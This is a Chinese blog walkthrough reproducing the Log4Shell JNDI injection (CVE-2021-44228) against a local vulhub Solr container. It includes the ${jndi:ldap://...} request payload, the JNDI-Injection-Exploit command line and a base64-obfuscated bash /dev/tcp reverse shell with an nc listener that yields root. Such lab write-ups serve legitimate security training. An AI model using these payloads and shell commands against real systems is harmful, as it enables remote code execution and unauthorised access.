Apache_Log4j2查找功能JNDI注入_CVE-2021-44228

煜磊2023-10-15 16:49

Apache_Log4j2查找功能JNDI注入_CVE-2021-44228

文章目录

    • Apache_Log4j2查找功能JNDI注入_CVE-2021-44228
      • [1 在线漏洞解读:](#1 在线漏洞解读:)
      • [2 环境搭建](#2 环境搭建)
      • [3 影响版本:](#3 影响版本:)
      • [4 漏洞复现](#4 漏洞复现)
        • [4.1 访问页面](#4.1 访问页面)
        • [4.2 poc漏洞验证](#4.2 poc漏洞验证)
      • [4.3 在dnslog获取个域名](#4.3 在dnslog获取个域名)
        • [4.4 使用bp抓包进行分析](#4.4 使用bp抓包进行分析)
        • [4.5 通信成功,此处可以漏洞利用](#4.5 通信成功,此处可以漏洞利用)
      • [5 构建一个imr服务器](#5 构建一个imr服务器)
        • [5.1 java通信协议](#5.1 java通信协议)
        • [5.2 下载工具JNDI协议服务](#5.2 下载工具JNDI协议服务)
        • [5.3 执行漏洞核心指令](#5.3 执行漏洞核心指令)
      • [6 kali进行下载安裝JNDI服务](#6 kali进行下载安裝JNDI服务)
        • [6.1 使用编译好的tar包,准备启动JNDI通信服务](#6.1 使用编译好的tar包,准备启动JNDI通信服务)
        • [6.2 执行](#6.2 执行)
        • [6.3 将下面请求依次放到bp--》漏洞请求参数中](#6.3 将下面请求依次放到bp--》漏洞请求参数中)
        • [6.4 查看docker容器](#6.4 查看docker容器)
        • [6.5 docker容器中成功创建文件test,命令执行成功](#6.5 docker容器中成功创建文件test,命令执行成功)
      • [7 构建反弹shell](#7 构建反弹shell)
        • [7.1 反弹shell一句话](#7.1 反弹shell一句话)
        • [7.2 使用在线工具转义](#7.2 使用在线工具转义)
        • [7.3 开启监听](#7.3 开启监听)
        • [7.4 重新启动 JNDI服务,并将开启shell连接一句话,放到 -C "command"中](#7.4 重新启动 JNDI服务,并将开启shell连接一句话,放到 -C “command”中)
        • [7.5 将扫描到的紫色标记连接地址-替换到下图红框中,进行转发](#7.5 将扫描到的紫色标记连接地址-替换到下图红框中,进行转发)
        • [7.6 请求后JNDI服务收到请求响应](#7.6 请求后JNDI服务收到请求响应)
        • [7.7 经过多次尝试,获取连接取得shell,获取root](#7.7 经过多次尝试,获取连接取得shell,获取root)

1 在线漏洞解读:

复制代码 
https://vulhub.org/#/environments/log4j/CVE-2021-44228/

2 环境搭建

shell 复制代码 
cd  /home/kali/vulhub/log4j/CVE-2021-44228

启动:

shell 复制代码 
sudo docker-compose up -d

sudo docker-compose ps -a
sudo docker ps -a

已启动:访问端口8900

3 影响版本:

​ Log4j2

4 漏洞复现

4.1 访问页面

​ 访问页面http://192.168.225.166:8900/

4.2 poc漏洞验证

简单地说,输入有效负载${jndi:dns://${sys:java.version}.example.com}可以触发JNDI查询的管理操作。

复制代码 
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.example.com} HTTP/1.1
Host: your-ip:8983
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Connection: close

4.3 在dnslog获取个域名

复制代码 
http://dnslog.cn/
4.4 使用bp抓包进行分析

将域名地址放入下图中,send转发看是否可以通信

复制代码 
GET /solr/admin/cores?action=${jndi:ldap://${sys:java.version}.qlsfi0.dnslog.cn} HTTP/1.1
4.5 通信成功,此处可以漏洞利用

5 构建一个imr服务器

5.1 java通信协议
复制代码 
JNDI,Java Nameing and Directory Interface,Java 命令与目录接口,是一组应用程序接口,目的是为了方便查找远程或本地对象。JNDI 典型的应用场景是配置数据源,除此之外,JNDI 还可以访问现有的目录和服务,例如LDAP| RMI| CORBA| DNS| NDS| NIS
5.2 下载工具JNDI协议服务
复制代码 
https://github.com/welk1n/JNDI-Injection-Exploit
5.3 执行漏洞核心指令
复制代码 
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]

要确保 1099、1389、8180端口可用,不被其他程序占用

6 kali进行下载安裝JNDI服务

复制代码 
┌──(kali💋kali)-[~/tools]
└─$ proxychains git clone https://github.com/welk1n/JNDI-Injection-Exploit.git


6.1 使用编译好的tar包,准备启动JNDI通信服务
复制代码 
┌──(kali💋kali)-[~/tools/java-unserialize/JNDI-Injection-Exploit/target]
└─$ pwd                                                                       
/home/kali/tools/java-unserialize/JNDI-Injection-Exploit/target
6.2 执行
复制代码 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch /tmp/test" -A "192.168.225.166"
6.3 将下面请求依次放到bp--》漏洞请求参数中
复制代码 
rmi://192.168.225.166:1099/zn7ifc
ldap://192.168.225.166:1389/zn7ifc
rmi://192.168.225.166:1099/cv02m1
rmi://192.168.225.166:1099/jxyhcp
ldap://192.168.225.166:1389/jxyhcp

GET /solr/admin/cores?action=${jndi:ldap://192.168.225.166:1389/zn7ifc} HTTP/1.1

kali后台:

6.4 查看docker容器
复制代码 
sudo docker ps -a
sudo docker exec -it d63fc660cd63  /bin/bash
6.5 docker容器中成功创建文件test,命令执行成功

7 构建反弹shell

7.1 反弹shell一句话
复制代码 
nc -lvvp  6666   # 开启监听6666端口服务
----------------------------------
bash -i >& /dev/tcp/192.168.225.166/6666 0>&1
----------------------------------
bash -i >& /dev/tcp/192.168.225.166/6666 0>&1 转成base64位:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx
----------------------------------
bash -c {echo,base64编码一句话shell}|{base64,-d}|{bash,-i}
--------------
最后组合为
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}
----------------------------------

输入java指令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.225.166"


bash -i &> /dev/tcp/192.168.225.166/6666 0<&1 # 反弹交互指令tcp服务
nc -lvp 6666 # l是监听模式;v是显示详细信息;p是指定端口;
7.2 使用在线工具转义
7.3 开启监听
复制代码 
nc  -lvvp  6666
7.4 重新启动 JNDI服务,并将开启shell连接一句话,放到 -C "command"中
复制代码 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIyNS4xNjYvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.225.166"
7.5 将扫描到的紫色标记连接地址-替换到下图红框中,进行转发
复制代码 
rmi://192.168.225.166:1099/i3hcpf
rmi://192.168.225.166:1099/w7eudo
ldap://192.168.225.166:1389/w7eudo
rmi://192.168.225.166:1099/vlvzc3
ldap://192.168.225.166:1389/vlvzc3
7.6 请求后JNDI服务收到请求响应
7.7 经过多次尝试,获取连接取得shell,获取root
相关推荐
SelectDB1 分钟前
Apache Doris 实时更新全解:从设计原理到最佳实践|Deep Dive
数据库·apache
路由侠内网穿透.1 小时前
本地部署问答社区 Apache Anwser 并实现外部访问
服务器·windows·网络协议·apache·远程工作
heartbeat..9 小时前
介绍java中常用于处理 Excel 文件的Apache POI
java·apache·excel·poi
vortex51 天前
基于 Apache 规则拦截目录扫描器请求:实测与配置指南
linux·网络安全·apache
观望过往1 天前
Apache IoTDB 连续查询(CQ)全解析
apache·iotdb
世界尽头与你1 天前
CVE-2020-1938_ Apache Tomcat AJP 文件读取与包含漏洞
java·网络安全·渗透测试·tomcat·apache
SelectDB技术团队1 天前
Apache Doris 在小米统一 OLAP 和湖仓一体的实践
数据仓库·数据分析·apache·数据库开发
过往记忆1 天前
Apache XTable:打破数据湖格式孤岛的“通用翻译官”
apache
耿雨飞1 天前
Apache Airflow 第四章:生态扩展与插件开发
apache·airflow
学网安的肆伍1 天前
【036-安全开发篇】JavaEE应用&第三方组件&Log4j日志&FastJson序列化&JNDI注入
安全·java-ee·log4j
热门推荐
01GitHub 镜像站点02【超详细教程】手把手教你从微软官网免费下载Windows 10官方原版ISO镜像(2025最新版)03UV安装并设置国内源04BongoCat - 跨平台键盘猫动画工具05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06本地部署阿里最新开源的Z-Image07Linux下V2Ray安装配置指南08React CVE-2025-55182漏洞排查与修复指南09Labelme从安装到标注:零基础完整指南10Meta第三代“分割一切”模型——SAM 3本地部署教程:首支持文本提示分割,400万概念、30毫秒响应,检测分割追踪一网打尽